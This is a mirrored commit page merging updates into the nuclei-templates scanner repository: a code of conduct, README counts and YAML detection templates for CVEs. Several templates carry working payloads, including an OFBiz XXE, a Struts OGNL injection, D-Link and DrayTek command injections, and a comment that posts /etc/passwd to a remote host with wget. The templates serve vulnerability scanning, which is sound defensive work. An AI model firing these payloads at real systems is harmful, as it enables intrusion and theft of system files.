daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-02-03 23:21:44 +05:30 committed by GitHub
parent 16f1cfc82c 310c2f3b52
commit 26f6d372ab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
94 changed files with 1258 additions and 58031 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

76
CODE_OF_CONDUCT.md Normal file
View File

@ -0,0 +1,76 @@
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at contact@projectdiscovery.io. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq

2
LICENSE.md
View File

@ -1,6 +1,6 @@
MIT License
Copyright (c) 2020 Exposed Atoms.
Copyright (c) 2020 ProjectDiscovery, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal

202
README.md
View File

@ -28,13 +28,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 154 | default-logins | 8 |
| dns | 6 | exposed-panels | 73 |
| exposed-tokens | 9 | exposures | 40 |
| fuzzing | 5 | helpers | 3 |
| miscellaneous | 14 | misconfiguration | 37 |
| takeovers | 1 | technologies | 44 |
| vulnerabilities | 66 | workflows | 17 |
| cves | 165 | default-logins | 8 |
| dns | 6 | exposed-panels | 74 |
| exposed-tokens | 9 | exposures | 41 |
| fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 39 |
| takeovers | 1 | technologies | 46 |
| vulnerabilities | 75 | workflows | 17 |
**Tree structure of nuclei templates:**
@ -43,6 +43,7 @@ An overview of the nuclei template directory including number of templates assoc
<summary> Nuclei templates </summary>
```
├── CODE_OF_CONDUCT.md
├── LICENSE.md
├── README.md
├── cves
@ -75,6 +76,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2018-1273.yaml
│   │   ├── CVE-2018-13379.yaml
│   │   ├── CVE-2018-13380.yaml
│   │   ├── CVE-2018-14574.yaml
│   │   ├── CVE-2018-14728.yaml
│   │   ├── CVE-2018-16341.yaml
│   │   ├── CVE-2018-16763.yaml
@ -89,7 +91,8 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2018-5230.yaml
│   │   ├── CVE-2018-7251.yaml
│   │   ├── CVE-2018-7490.yaml
│   │   └── CVE-2018-8006.yaml
│   │   ├── CVE-2018-8006.yaml
│   │   └── CVE-2018-8033.yaml
│   ├── 2019
│   │   ├── CVE-2019-10092.yaml
│   │   ├── CVE-2019-1010287.yaml
@ -117,6 +120,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-16759.yaml
│   │   ├── CVE-2019-16920.yaml
│   │   ├── CVE-2019-17382.yaml
│   │   ├── CVE-2019-17506.yaml
│   │   ├── CVE-2019-17558.yaml
│   │   ├── CVE-2019-18394.yaml
│   │   ├── CVE-2019-19368.yaml
@ -145,69 +149,78 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-9733.yaml
│   │   ├── CVE-2019-9955.yaml
│   │   └── CVE-2019-9978.yaml
│   └── 2020
│   ├── CVE-2020-0618.yaml
│   ├── CVE-2020-10148.yaml
│   ├── CVE-2020-10199.yaml
│   ├── CVE-2020-10204.yaml
│   ├── CVE-2020-11034.yaml
│   ├── CVE-2020-1147.yaml
│   ├── CVE-2020-11738.yaml
│   ├── CVE-2020-12116.yaml
│   ├── CVE-2020-12720.yaml
│   ├── CVE-2020-13167.yaml
│   ├── CVE-2020-13942.yaml
│   ├── CVE-2020-14179.yaml
│   ├── CVE-2020-14181.yaml
│   ├── CVE-2020-14864.yaml
│   ├── CVE-2020-14882.yaml
│   ├── CVE-2020-15129.yaml
│   ├── CVE-2020-15505.yaml
│   ├── CVE-2020-15920.yaml
│   ├── CVE-2020-16846.yaml
│   ├── CVE-2020-16952.yaml
│   ├── CVE-2020-17505.yaml
│   ├── CVE-2020-17506.yaml
│   ├── CVE-2020-17518.yaml
│   ├── CVE-2020-17519.yaml
│   ├── CVE-2020-1943.yaml
│   ├── CVE-2020-2096.yaml
│   ├── CVE-2020-2140.yaml
│   ├── CVE-2020-23972.yaml
│   ├── CVE-2020-24223.yaml
│   ├── CVE-2020-24312.yaml
│   ├── CVE-2020-2551.yaml
│   ├── CVE-2020-25540.yaml
│   ├── CVE-2020-26214.yaml
│   ├── CVE-2020-3187.yaml
│   ├── CVE-2020-3452.yaml
│   ├── CVE-2020-4463.yaml
│   ├── CVE-2020-5284.yaml
│   ├── CVE-2020-5405.yaml
│   ├── CVE-2020-5410.yaml
│   ├── CVE-2020-5412.yaml
│   ├── CVE-2020-5776.yaml
│   ├── CVE-2020-5777.yaml
│   ├── CVE-2020-5902.yaml
│   ├── CVE-2020-6287.yaml
│   ├── CVE-2020-7209.yaml
│   ├── CVE-2020-7318.yaml
│   ├── CVE-2020-7961.yaml
│   ├── CVE-2020-8091.yaml
│   ├── CVE-2020-8115.yaml
│   ├── CVE-2020-8163.yaml
│   ├── CVE-2020-8191.yaml
│   ├── CVE-2020-8193.yaml
│   ├── CVE-2020-8194.yaml
│   ├── CVE-2020-8209.yaml
│   ├── CVE-2020-8512.yaml
│   ├── CVE-2020-8982.yaml
│   ├── CVE-2020-9047.yaml
│   ├── CVE-2020-9344.yaml
│   ├── CVE-2020-9376.yaml
│   ├── CVE-2020-9484.yaml
│   ├── CVE-2020-9496.yaml
│   └── CVE-2020-9757.yaml
│   ├── 2020
│   │   ├── CVE-2020-0618.yaml
│   │   ├── CVE-2020-10148.yaml
│   │   ├── CVE-2020-11034.yaml
│   │   ├── CVE-2020-1147.yaml
│   │   ├── CVE-2020-11710.yaml
│   │   ├── CVE-2020-11738.yaml
│   │   ├── CVE-2020-12116.yaml
│   │   ├── CVE-2020-12720.yaml
│   │   ├── CVE-2020-13167.yaml
│   │   ├── CVE-2020-13937.yaml
│   │   ├── CVE-2020-13942.yaml
│   │   ├── CVE-2020-14179.yaml
│   │   ├── CVE-2020-14181.yaml
│   │   ├── CVE-2020-14864.yaml
│   │   ├── CVE-2020-14882.yaml
│   │   ├── CVE-2020-15129.yaml
│   │   ├── CVE-2020-15505.yaml
│   │   ├── CVE-2020-15920.yaml
│   │   ├── CVE-2020-16846.yaml
│   │   ├── CVE-2020-16952.yaml
│   │   ├── CVE-2020-17505.yaml
│   │   ├── CVE-2020-17506.yaml
│   │   ├── CVE-2020-17518.yaml
│   │   ├── CVE-2020-17519.yaml
│   │   ├── CVE-2020-17530.yaml
│   │   ├── CVE-2020-1943.yaml
│   │   ├── CVE-2020-2096.yaml
│   │   ├── CVE-2020-2140.yaml
│   │   ├── CVE-2020-23972.yaml
│   │   ├── CVE-2020-24223.yaml
│   │   ├── CVE-2020-24312.yaml
│   │   ├── CVE-2020-24579.yaml
│   │   ├── CVE-2020-2551.yaml
│   │   ├── CVE-2020-25540.yaml
│   │   ├── CVE-2020-26214.yaml
│   │   ├── CVE-2020-27986.yaml
│   │   ├── CVE-2020-3187.yaml
│   │   ├── CVE-2020-3452.yaml
│   │   ├── CVE-2020-35476.yaml
│   │   ├── CVE-2020-4463.yaml
│   │   ├── CVE-2020-5284.yaml
│   │   ├── CVE-2020-5405.yaml
│   │   ├── CVE-2020-5410.yaml
│   │   ├── CVE-2020-5412.yaml
│   │   ├── CVE-2020-5776.yaml
│   │   ├── CVE-2020-5777.yaml
│   │   ├── CVE-2020-5902.yaml
│   │   ├── CVE-2020-6287.yaml
│   │   ├── CVE-2020-7209.yaml
│   │   ├── CVE-2020-7318.yaml
│   │   ├── CVE-2020-7961.yaml
│   │   ├── CVE-2020-8091.yaml
│   │   ├── CVE-2020-8115.yaml
│   │   ├── CVE-2020-8163.yaml
│   │   ├── CVE-2020-8191.yaml
│   │   ├── CVE-2020-8193.yaml
│   │   ├── CVE-2020-8194.yaml
│   │   ├── CVE-2020-8209.yaml
│   │   ├── CVE-2020-8512.yaml
│   │   ├── CVE-2020-8515.yaml
│   │   ├── CVE-2020-8982.yaml
│   │   ├── CVE-2020-9047.yaml
│   │   ├── CVE-2020-9344.yaml
│   │   ├── CVE-2020-9376.yaml
│   │   ├── CVE-2020-9484.yaml
│   │   ├── CVE-2020-9496.yaml
│   │   └── CVE-2020-9757.yaml
│   └── 2021
│   ├── CVE-2021-22873.yaml
│   ├── CVE-2021-25646.yaml
│   └── CVE-2021-3019.yaml
├── default-logins
│   ├── activemq
│   │   └── activemq-default-login.yaml
@ -268,6 +281,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── kafka-connect-ui.yaml
│   ├── kafka-monitoring.yaml
│   ├── kafka-topics-ui.yaml
│   ├── key-cloak-admin-panel.yaml
│   ├── kubernetes-dashboard.yaml
│   ├── manage-engine-admanager-panel.yaml
│   ├── mobileiron-login.yaml
@ -331,12 +345,14 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── zip-backup-files.yaml
│   ├── configs
│   │   ├── airflow-configuration-exposure.yaml
│   │   ├── alibaba-canal-info-leak.yaml
│   │   ├── amazon-docker-config-disclosure.yaml
│   │   ├── ansible-config-disclosure.yaml
│   │   ├── composer-config.yaml
│   │   ├── exposed-svn.yaml
│   │   ├── git-config-nginxoffbyslash.yaml
│   │   ├── git-config.yaml
│   │   ├── gmail-api-client-secrets.yaml
│   │   ├── htpasswd-detection.yaml
│   │   ├── laravel-env.yaml
│   │   ├── magento-config.yaml
@ -347,7 +363,6 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── phpinfo.yaml
│   │   ├── rails-database-config.yaml
│   │   ├── redmine-db-config.yaml
│   │   ├── server-status-localhost.yaml
│   │   ├── syfmony-profiler.yaml
│   │   ├── symfony-database-config.yaml
│   │   ├── symfony-profiler.yaml
@ -371,16 +386,12 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── arbitrary-file-read.yaml
│   ├── directory-traversal.yaml
│   ├── generic-lfi-fuzzing.yaml
│   ├── iis-shortname.yaml
│   └── wp-plugin-scan.yaml
│   └── iis-shortname.yaml
├── helpers
│   ├── payloads
│   │   ├── CVE-2020-5776.csv
│   │   └── CVE-2020-6287.xml
│   └── wordlists
│   └── wp-plugins.txt
│   └── payloads
│   ├── CVE-2020-5776.csv
│   └── CVE-2020-6287.xml
├── miscellaneous
│   ├── basic-cors-flash.yaml
│   ├── dir-listing.yaml
│   ├── htaccess-config.yaml
│   ├── missing-csp.yaml
@ -392,7 +403,6 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── security.txt.yaml
│   ├── trace-method.yaml
│   ├── unencrypted-bigip-ltm-cookie.yaml
│   ├── wp-xmlrpc.yaml
│   └── xml-schema-detect.yaml
├── misconfiguration
│   ├── aem-groovyconsole.yaml
@ -403,12 +413,12 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── aws-redirect.yaml
│   ├── cgi-test-page.yaml
│   ├── django-debug-detect.yaml
│   ├── docker-api.yaml
│   ├── docker-registry.yaml
│   ├── druid-monitor.yaml
│   ├── drupal-user-enum-ajax.yaml
│   ├── drupal-user-enum-redirect.yaml
│   ├── elasticsearch.yaml
│   ├── exposed-docker-api.yaml
│   ├── exposed-kibana.yaml
│   ├── exposed-service-now.yaml
│   ├── front-page-misconfig.yaml
@ -419,13 +429,22 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── larvel-debug.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── manage-engine-ad-search.yaml
│   ├── nginx-status.yaml
│   ├── php-errors.yaml
│   ├── php-fpm-status.yaml
│   ├── put-method-enabled.yaml
│   ├── rack-mini-profiler.yaml
│   ├── salesforce-aura-misconfig.yaml
│   ├── server-status-localhost.yaml
│   ├── shell-history.yaml
│   ├── sidekiq-dashboard.yaml
│   ├── springboot-detect.yaml
│   ├── springboot
│   │   ├── springboot-configprops.yaml
│   │   ├── springboot-env.yaml
│   │   ├── springboot-heapdump.yaml
│   │   ├── springboot-loggers.yaml
│   │   ├── springboot-mappings.yaml
│   │   └── springboot-trace.yaml
│   ├── symfony-debugmode.yaml
│   ├── tomcat-scripts.yaml
│   ├── unauthenticated-airflow.yaml
@ -442,6 +461,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── cacti-detect.yaml
│   ├── clockwork-php-page.yaml
│   ├── couchdb-detect.yaml
│   ├── detect-springboot-actuator.yaml
│   ├── favicon-detection.yaml
│   ├── firebase-detect.yaml
│   ├── google-storage.yaml
@ -468,6 +488,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── s3-detect.yaml
│   ├── sap-netweaver-as-java-detect.yaml
│   ├── sap-netweaver-detect.yaml
│   ├── selea-ip-camera.yaml
│   ├── shiro-detect.yaml
│   ├── sql-server-reporting.yaml
│   ├── tech-detect.yaml
@ -505,12 +526,16 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── oracle
│   │   └── oracle-ebs-bispgraph-file-access.yaml
│   ├── other
│   │   ├── CNVD-2020-62422.yaml
│   │   ├── acme-xss.yaml
│   │   ├── aspnuke-openredirect.yaml
│   │   ├── bullwark-momentum-series-directory-traversal.yaml
│   │   ├── bullwark-momentum-lfi.yaml
│   │   ├── cached-aem-pages.yaml
│   │   ├── chamilo-lms-xss.yaml
│   │   ├── couchdb-adminparty.yaml
│   │   ├── discourse-xss.yaml
│   │   ├── dlink-850L-info-leak.yaml
│   │   ├── keycloak-xss.yaml
│   │   ├── mcafee-epo-rce.yaml
│   │   ├── microstrategy-ssrf.yaml
│   │   ├── mida-eframework-xss.yaml
@ -520,13 +545,16 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── rce-shellshock-user-agent.yaml
│   │   ├── rce-via-java-deserialization.yaml
│   │   ├── rconfig-rce.yaml
│   │   ├── sangfor-edr-rce.yaml
│   │   ├── sick-beard-xss.yaml
│   │   ├── sonicwall-sslvpn-shellshock.yaml
│   │   ├── symantec-messaging-gateway.yaml
│   │   ├── thinkific-redirect.yaml
│   │   ├── tikiwiki-reflected-xss.yaml
│   │   ├── twig-php-ssti.yaml
│   │   ├── vpms-auth-bypass.yaml
│   │   ├── wems-manager-xss.yaml
│   │   ├── wooyun-path-traversal.yaml
│   │   ├── yarn-resourcemanager-rce.yaml
│   │   └── zms-auth-bypass.yaml
│   ├── rails
@ -557,7 +585,9 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── wordpress-tmm-db-migrate.yaml
│   ├── wordpress-user-enumeration.yaml
│   ├── wordpress-wordfence-xss.yaml
│   └── wordpress-wpcourses-info-disclosure.yaml
│   ├── wordpress-wpcourses-info-disclosure.yaml
│   ├── wp-enabled-registration.yaml
│   └── wp-xmlrpc.yaml
└── workflows
├── artica-web-proxy-workflow.yaml
├── bigip-workflow.yaml
@ -580,7 +610,7 @@ An overview of the nuclei template directory including number of templates assoc
</details>
**54 directories, 479 files**.
**55 directories, 508 files**.
📖 Documentation
-----

22
cves/2018/CVE-2018-14574.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2018-14574
info:
name: Django Open Redirect
author: pikpikcu
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}//www.example.com"
matchers-condition: and
matchers:
- type: status
status:
- 301
- type: word
words:
- "Location: https://www.example.com"
- "Location: http://www.example.com"
part: header

28
cves/2018/CVE-2018-8033.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2018-8033
info:
name: Apache OFBiz XXE
author: pikpikcu
severity: high
description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
requests:
- raw:
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: application/xml
<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200

28
cves/2019/CVE-2019-17506.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2019-17506
info:
name: DLINK DIR-868L & DIR-817LW Info Leak
author: pikpikcu
severity: critical
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
requests:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</password>"
- "DEVICE.ACCOUNT"
part: body

27
cves/2020/CVE-2020-10199.yaml
View File

@ -1,27 +0,0 @@
id: CVE-2020-10199
info:
name: Nexus Repository Manager 3 RCE
author: hetroublemakr
severity: high
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/rest/beta/repositories/go/group'
headers:
Content-Type: application/json
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 400

25
cves/2020/CVE-2020-10204.yaml
View File

@ -1,25 +0,0 @@
id: CVE-2020-10204
info:
name: Sonatype Nexus Repository RCE
author: hetroublemakr
severity: high
description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/extdirect'
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 200

28
cves/2020/CVE-2020-11710.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2020-11710
info:
name: Kong Admin Rest API Unauth
author: pikpikcu
severity: info
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-11710
requests:
- method: GET
path:
- "{{BaseURL}}"
# - "{{BaseURL}}/endpoints"
# - "{{BaseURL}}/status"
matchers-condition: and
matchers:
- type: word
words:
- 'Welcome to kong'
- 'configuration'
- 'kong_env'
condition: and
part: body
- type: status
status:
- 200

40
cves/2020/CVE-2020-13937.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2020-13937
info:
name: Apache Kylin Unauth
author: pikpikcu
severity: medium
description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
# References:
# https://s.tencent.com/research/bsafe/1156.html
# https://nvd.nist.gov/vuln/detail/CVE-2020-13937
requests:
- method: GET
path:
- "{{BaseURL}}/kylin/api/admin/config"
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "config"
condition: and
part: body

26
cves/2020/CVE-2020-17530.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-17530
info:
name: Apache Struts RCE
author: pikpikcu
severity: critical
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
# References:
# http://jvn.jp/en/jp/JVN43969166/index.html
# http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
# https://cwiki.apache.org/confluence/display/WW/S2-061
# https://security.netapp.com/advisory/ntap-20210115-0005/
requests:
- method: GET
path:
- "{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

46
cves/2020/CVE-2020-24579.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2020-24579
info:
name: DLINK DSL 2888a RCE
author: pikpikcu
severity: medium
reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
requests:
- raw:
- | # Response:Location: /page/login/login_fail.html
POST / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- "root:[x*]:0:0"
condition: or

31
cves/2020/CVE-2020-27986.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-27986
info:
name: SonarQube unauth
author: pikpikcu
severity: medium
description: |
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
# Refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
requests:
- method: GET
path:
- "{{BaseURL}}/api/settings/values"
matchers-condition: and
matchers:
- type: word
words:
- email.smtp_host.secured
- email.smtp_password.secured
- email.smtp_port.secured
- email.smtp_username.secured
part: body
condtion: and
- type: status
status:
- 200

32
cves/2020/CVE-2020-35476.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-35476
info:
name: OpenTSDB 2.4.0 Remote Code Execution
author: pikpikcu
severity: critical
description: A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory.
reference: https://github.com/OpenTSDB/opentsdb/issues/2051
# Extracting /etc/passwd to remote host:-
# /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
requests:
- method: GET
path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- plotted
- timing
- cachehit
part: body
condtion: and
- type: word
words:
- application/json
part: header

33
cves/2020/CVE-2020-8515.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2020-8515
info:
name: DrayTek pre-auth RCE
author: pikpikcu
severity: critical
reference: https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
# References:
# https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
# https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
requests:
- raw:
- |
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200

15
cves/2020/CVE-2020-9496.yaml
View File

@ -24,21 +24,6 @@ requests:
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}:8080
Origin: http://{{Hostname}}:8080
Content-Type: application/xml
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}:8443
Origin: https://{{Hostname}}:8443
Content-Type: application/xml
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word

29
cves/2021/CVE-2021-22873.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-22873
info:
name: Revive Adserver < 5.1.0 Open Redirect
author: pudsec
severity: low
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873
requests:
- method: GET
path:
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
redirects: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Example Domain</title>"
part: body

50
cves/2021/CVE-2021-25646.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-25646
info:
name: Apache Druid RCE
author: pikpikcu
severity: critical
reference: https://paper.seebug.org/1476/
description: |
